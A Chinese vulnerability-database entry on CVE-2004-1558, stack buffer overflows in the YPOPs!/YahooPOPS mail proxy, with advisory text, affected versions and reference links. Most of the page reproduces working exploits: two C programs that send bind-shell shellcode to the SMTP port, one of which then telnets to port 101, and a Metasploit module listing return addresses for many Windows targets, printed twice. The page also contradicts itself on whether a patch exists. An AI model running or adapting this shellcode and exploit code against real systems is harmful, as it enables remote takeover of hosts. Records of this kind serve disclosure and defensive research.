CVE-2004-1558
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 22:56:28
NMCOEP    

[原文]Multiple stack-based buffer overflows in YPOPs! (aka YahooPOPS) 0.4 through 0.6 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) POP3 USER command or (2) SMTP request.


[CNNVD]YahooPOPS!多个远程缓冲区溢出漏洞(CNNVD-200412-1143)

        YPOPs!(又称为YahooPOPS)0.4到0.6版本存在多个基于堆栈的缓冲区溢出漏洞。远程攻击者借助超长(1)POP3 USER命令或(2)SMTP导致服务拒绝(崩溃)并可能执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:ypops:ypops:0.6
cpe:/a:ypops:ypops:0.4.5
cpe:/a:ypops:ypops:0.5
cpe:/a:ypops:ypops:0.4
cpe:/a:ypops:ypops:0.4.4
cpe:/a:ypops:ypops:0.4.6
cpe:/a:ypops:ypops:0.4.1
cpe:/a:ypops:ypops:0.4.3
cpe:/a:ypops:ypops:0.4.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1558
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1558
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-1143
(官方数据源) CNNVD

- 其它链接及资源

http://dbeusee.home.comcast.net/history.html
(UNKNOWN)  CONFIRM  http://dbeusee.home.comcast.net/history.html
http://marc.info/?l=bugtraq&m=109630699829536&w=2
(UNKNOWN)  BUGTRAQ  20040927 [Hat-Squad] Remote Buffer overflow Vulnerability in YahooPOPS
http://securitytracker.com/alerts/2004/Sep/1011426.html
(UNKNOWN)  SECTRACK  1011426
http://www.attrition.org/pipermail/vim/2006-October/001089.html
(UNKNOWN)  VIM  20061020 vendor ACK for old YPOPs! issue
http://www.hat-squad.com/en/000075.html
(VENDOR_ADVISORY)  MISC  http://www.hat-squad.com/en/000075.html
http://www.securityfocus.com/bid/11256
(PATCH)  BID  11256
http://xforce.iss.net/xforce/xfdb/17515
(PATCH)  XF  ypops-pop3-bo(17515)
http://xforce.iss.net/xforce/xfdb/17518
(PATCH)  XF  ypops-smtp-bo(17518)

- 漏洞信息

YahooPOPS!多个远程缓冲区溢出漏洞
高危 缓冲区溢出
2004-12-31 00:00:00 2006-10-30 00:00:00
远程  
        YPOPs!(又称为YahooPOPS)0.4到0.6版本存在多个基于堆栈的缓冲区溢出漏洞。远程攻击者借助超长(1)POP3 USER命令或(2)SMTP导致服务拒绝(崩溃)并可能执行任意代码。

- 公告与补丁

        These issues have been addressed in version 0.6.050104.
        YahooPOPS! YahooPOPS! 0.4
        
        YahooPOPS! YahooPOPS! 0.5
        
        YahooPOPS! YahooPOPS! 0.6
        

- 漏洞信息 (577)

YahooPOPs <= 1.6 SMTP Port Buffer Overflow Exploit (EDBID:577)
windows remote
2004-10-15 Verified
25 class101
N/A [点击下载]
/*

YahooPOPS v1.6 and prior SMTP port buffer overflow exploit v0.1
Exploit code by class101 [at] DFind.kd-team.com 
Bind a shellcode to the port 101.

Thanx to Behrang Fouladi(behrang@hat-squad.com) for the bug discovery
Thanx to HDMoore and Metasploit.com for their kickass ASM work

Instead of to move like you Behrang EBX to ESP after overwritting EIP, 
I found out that only jumping to EBX is needed because our crafted payload 
starts at EBX.

The exploit is tested working on Win2K SP4 and WinXP SP1, and it should works 
also on NT4 and 2003 as the shellcode is designed for.

The jmp esp is from libcurl.dll wich come with yahoopops, just to notice there is no need of an offset update, 
this is already "universal".

This exploit can't overflow the port 110 (POP3), not enough space in the buffer to add a bind/reverse shell
maybe enough to spawn only one as the well know KaHT.
If you want to try on POP3, you should request more than 180 bytes to overwrite EAX and ECX
Maybe in a v0.2, I will add it , anyway check http://DFind.kd-team.com regulary.

*/

#include "winsock2.h"
#include "fstream.h"

#pragma comment(lib, "ws2_32")

char scode[] =  //BIND shellcode port 101, thanx HDMoore. 
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";

static char payload[1024];

char jmp[]="\x23\x9b\x02\x10"; //JMP ESP
char jmpebx[]="\xff\xe3";  //JMP EBX

void usage(char* us);
WSADATA wsadata;
void ver();

int main(int argc,char *argv[])
{
	ver();
	if ((argc<2)||(argc>3)){usage(argv[0]);return -1;}
	if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;}
	char recvbuf[100];
	int ip=htonl(inet_addr(argv[1])), port, size, x;
	if (argc==3){port=atoi(argv[2]);}
	else port=25;
	SOCKET s;
	struct fd_set mask;
	struct timeval timeout; 
	struct sockaddr_in server;
	s=socket(AF_INET,SOCK_STREAM,0);
	if (s==INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;}
	server.sin_family=AF_INET;
	server.sin_addr.s_addr=htonl(ip);
	server.sin_port=htons(port);
	WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
	timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
	switch(select(s+1,NULL,&mask,NULL,&timeout))
	{
		case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
		case 0: {cout<<"[+] connect() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
		default:
		if(FD_ISSET(s,&mask))
		{
			cout<<"[+] connected, checking the server..."<<endl;
			Sleep(1000);recv(s,recvbuf,200,0);
			if (strstr(recvbuf,"OK POP3 YahooPOPs")){cout<<"[+] this is not the POP3 port but the SMTP port that you should use."<<endl;return -1;}
			if (!strstr(recvbuf,"220 YahooPOPs")){cout<<"[+] this is not a YahooPOPS server, quitting..."<<endl;return -1;}
			cout<<"[+] YahooPOPS SMTP detected, constructing the payload"<<endl;
			size=508-sizeof(scode);
			memset(payload,0,sizeof(payload));
			for (x=0;x<size;x++){strcat(payload,"\x90");}
			strcat(payload,scode);strcat(payload,jmp);strcat(payload,jmpebx);
		    if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;}
			cout<<"[+] payload send, connect the port 101 to get a shell."<<endl;
			return 0;
		}
	}
	closesocket(s);
	WSACleanup();
	return 0;
}


void usage(char* us) 
{  
	cout<<"USAGE: 101_ypops.exe ip port\n"<<endl;
	cout<<"NOTE: The port should be the SMTP, not POP3!"<<endl;
	cout<<"      The port 25 is default if no port specified."<<endl;
	cout<<"      The exploit bind a shellcode to the port 101."<<endl;
	return;
} 

void ver()
{	
cout<<endl;
cout<<"                                                                   "<<endl;
cout<<"        ===================================================[v0.1]==="<<endl;
cout<<"        ===YahooPOPS <= v1.6, SMTP Remote Buffer Overflow Exploit==="<<endl;
cout<<"        =====coded by class101===========[DFind.kd-team.com 2004]==="<<endl;
cout<<"        ============================================================"<<endl;
cout<<"                                                                   "<<endl;
}

// milw0rm.com [2004-10-15]
		

- 漏洞信息 (582)

YahooPOPs <= 1.6 SMTP Remote Buffer Overflow Exploit (EDBID:582)
windows remote
2004-10-18 Verified
25 Diabolic Crab
N/A [点击下载]
//Diabolic Crab's exploit for YahooPOPs <= 1.6 SMTP
//dcrab@hackerscenter.com
//www.hackerscenter.com
//For more work check out, http://icis.digitalparadox.org
//This was done at 4 am so escuse the messy code if any
//Good job class101 on the windows version ;)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <errno.h>
#include <unistd.h>
#include <sys/socket.h>

char scode[] = //Bind shell on port 101, taken from the windows exploit by class101
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";

static char payload[1024];

char jmp[]="\x23\x9b\x02\x10"; //JMP ESP
char jmpebx[]="\xff\xe3"; //JMP EBX

void usage(char* us);
void ver();

 int main(int argc, char *argv[])
 {
     ver();
         char grab[999];
         int sock;
         if (argc<4){
         usage(argv[0]);return -1;
                        }
         int ip=htonl(inet_addr(argv[1])), port, size, x;
         if (argc==3){port=atoi(argv[2]);}
         else port=25;
         struct hostent *aap;
         struct sockaddr_in addr;
         if((aap=(struct hostent *)gethostbyname(argv[1]))==NULL) {
         perror("Gethostbyname()");
         exit(1); }
         if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
         perror("Socket()");
         exit(1); }
                 addr.sin_family=AF_INET;
                 addr.sin_port=htons(port);
                 memcpy((char *)&addr.sin_addr,(char *)aap->h_addr,aap->h_length);
         if(connect(sock,(struct sockaddr *)&addr,sizeof(addr))!=0) {
         perror("Connect()");
         exit(0); }
                 printf ("[+] Connected\n");
                 fflush(stdin);
                 sleep(2);
                 read(sock,grab,200);
                 printf ("[+] Reading Banner\n");
         if (!strstr(grab,"220 YahooPOPs")) {
         printf("[+] this is not a YahooPOPS server, quitting...\n");
         return -1; }
                 printf ("[+] Found YahooPOP's Server\n");
                 size=508-sizeof(scode);
                 memset(payload,0,sizeof(payload));
                 for (x=0;x<size;x++){strcat(payload,"\x90");}
                 
strcat(payload,scode);strcat(payload,jmp);strcat(payload,jmpebx);
                 printf ("[+] Sending Shellcode\n");
         if (send(sock, payload, strlen(payload), 0) < 0) {
         perror("Send()");
         exit(0); }
                 printf ("[+] Sleep for 3 seconds\n");
                 sleep(3);
                 char hack[100];
                 sprintf (hack, "telnet %s 101", argv[1]);
                 system (hack);
                 return 0;
 }

void usage(char* us)
{
                 printf("Usage: ./dc_ypop ip port\n");
                 printf("The exploit binds a shell to the port 101.\n");
                 return;
}

void ver()
{
                 printf ("################################################################\n");
                 printf ("# Diabolic Crab's Bind Shell Exploit for YahooPOPS <= 1.6 SMTP #\n");
                 printf ("# dcrab@hackerscenter.com www.hackerscenter.com #\n");
                 printf ("# Credits to Behrang Fouladi for finding this bug #\n");
                 printf ("################################################################\n");
}

// milw0rm.com [2004-10-18]
		

- 漏洞信息 (16818)

YPOPS 0.6 Buffer Overflow (EDBID:16818)
windows remote
2010-05-09 Verified
25 metasploit
N/A [点击下载]
##
# $Id: ypops_overflow1.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Smtp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'YPOPS 0.6 Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the YPOPS POP3
				service.

				This is a classic stack buffer overflow for YPOPS version 0.6.
				Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to
				jmp ebx opcode in ws_32.dll
			},
			'Author'         => [ 'acaro <acaro@jervus.it>' ],
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2004-1558'],
					[ 'OSVDB', '10367'],
					[ 'BID', '11256'],
					[ 'URL', 'http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html'],
				],
			'Platform'       => 'win',
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1200,
					'BadChars' => "\x00\x25",
					'MinNops'  => 106,
				},
			'Targets'        =>
				[
					[ 'Windows 2000 SP0 Italian',   { 'Ret' => 0x74fe6113, 'Offset' => 503 }, ],
					[ 'Windows 2000 Advanced Server Italian SP4', { 'Ret' => 0x74fe16e2, 'Offset' => 503 }, ],
					[ 'Windows 2000 Advanced Server SP3 English', { 'Ret' => 0x74fe22f3, 'Offset' => 503 }, ],
					[ 'Windows 2000 SP0 English',   { 'Ret' => 0x75036113, 'Offset' => 503 }, ],
					[ 'Windows 2000 SP1 English',   { 'Ret' => 0x750317b2, 'Offset' => 503 }, ],
					[ 'Windows 2000 SP2 English',   { 'Ret' => 0x7503435b, 'Offset' => 503 }, ],
					[ 'Windows 2000 SP3 English',   { 'Ret' => 0x750322f3, 'Offset' => 503 }, ],
					[ 'Windows 2000 SP4 English',   { 'Ret' => 0x750316e2, 'Offset' => 503 }, ],
					[ 'Windows XP SP0-SP1 English', { 'Ret' => 0x71ab1636, 'Offset' => 503 }, ],
					[ 'Windows XP SP2 English',     { 'Ret' => 0x71ab773b, 'Offset' => 503 }, ],
					[ 'Windows 2003 SP0 English',   { 'Ret' => 0x71c04202, 'Offset' => 503 }, ],
					[ 'Windows 2003 SP1 English',   { 'Ret' => 0x71c05fb0, 'Offset' => 503 }, ],
				],
			'DisclosureDate' => 'Sep 27 2004'))
	end

	def check
		connect
		disconnect

		banner.gsub!(/\n/, '')

		if banner =~ /YahooPOPs! Simple Mail Transfer Service Ready/
			print_status("Vulnerable SMTP server: #{banner}")
			return Exploit::CheckCode::Detected
		end

		print_status("Unknown SMTP server: #{banner}")
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		pattern =
			rand_text_alpha(target['Offset'] - payload.encoded.length) +
			payload.encoded +
			[target.ret].pack('V') +
			"\n"

		print_status("Trying #{target.name} using jmp ebx at #{"0x%.8x" % target.ret}")

		sock.put(pattern)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83157)

YPOPS 0.6 Buffer Overflow (PacketStormID:F83157)
2009-11-26 00:00:00
acaro  metasploit.com
exploit,overflow
CVE-2004-1558
[点击下载]

This Metasploit module exploits a stack overflow in the YPOPS POP3 service. This is a classic stack overflow for YPOPS version 0.6. Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to jmp ebx opcode in ws_32.dll

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Smtp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'YPOPS 0.6 Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the YPOPS POP3
				service.

				This is a classic stack overflow for YPOPS version 0.6.
				Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to
				jmp ebx opcode in ws_32.dll
					
			},
			'Author'         => [ 'acaro <acaro@jervus.it>' ],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-1558'],
					[ 'OSVDB', '10367'],
					[ 'BID', '11256'],
					[ 'URL', 'http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html'],

				],
			'Platform'       => 'win',
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1200,
					'BadChars' => "\x00\x25",
					'MinNops'  => 106,

				},
			'Targets'        => 
				[
					[ 'Windows 2000 SP0 Italian',   { 'Ret' => 0x74fe6113, 'Offset' => 503 }, ],
					[ 'Windows 2000 Advanced Server Italian SP4', { 'Ret' => 0x74fe16e2, 'Offset' => 503 }, ],
					[ 'Windows 2000 Advanced Server SP3 English', { 'Ret' => 0x74fe22f3, 'Offset' => 503 }, ],
					[ 'Windows 2000 SP0 English',   { 'Ret' => 0x75036113, 'Offset' => 503 }, ],
					[ 'Windows 2000 SP1 English',   { 'Ret' => 0x750317b2, 'Offset' => 503 }, ],
					[ 'Windows 2000 SP2 English',   { 'Ret' => 0x7503435b, 'Offset' => 503 }, ],
					[ 'Windows 2000 SP3 English',   { 'Ret' => 0x750322f3, 'Offset' => 503 }, ],
					[ 'Windows 2000 SP4 English',   { 'Ret' => 0x750316e2, 'Offset' => 503 }, ],
					[ 'Windows XP SP0-SP1 English', { 'Ret' => 0x71ab1636, 'Offset' => 503 }, ],
					[ 'Windows XP SP2 English',     { 'Ret' => 0x71ab773b, 'Offset' => 503 }, ],
					[ 'Windows 2003 SP0 English',   { 'Ret' => 0x71c04202, 'Offset' => 503 }, ],
					[ 'Windows 2003 SP1 English',   { 'Ret' => 0x71c05fb0, 'Offset' => 503 }, ],
				],
			'DisclosureDate' => 'Sep 27 2004'))
	end

	def check
		connect
		disconnect

		banner.gsub!(/\n/, '')

		if banner =~ /YahooPOPs! Simple Mail Transfer Service Ready/
			print_status("Vulnerable SMTP server: #{banner}")
			return Exploit::CheckCode::Detected
		end

		print_status("Unknown SMTP server: #{banner}")
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		pattern = 
			rand_text_alpha(target['Offset'] - payload.encoded.length) +
			payload.encoded +
			[target.ret].pack('V') + 
			"\n"

		print_status("Trying #{target.name} using jmp ebx at #{"0x%.8x" % target.ret}")

		sock.put(pattern)
		
		handler
		disconnect
	end

end
    

- 漏洞信息

10366
YahooPOPS POP3 Service USER Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

A remote overflow exists in YPOPS!. YPOPS! fails to validate input on POP3 requests resulting in a buffer overflow. With a specially crafted request, an attacker can cause execution of arbitrary code resulting in a loss of integrity.

- 时间线

2004-09-27 Unknow
2004-09-27 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): Disable the SMTP service and bind only the POP3 service to the loopback interface.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站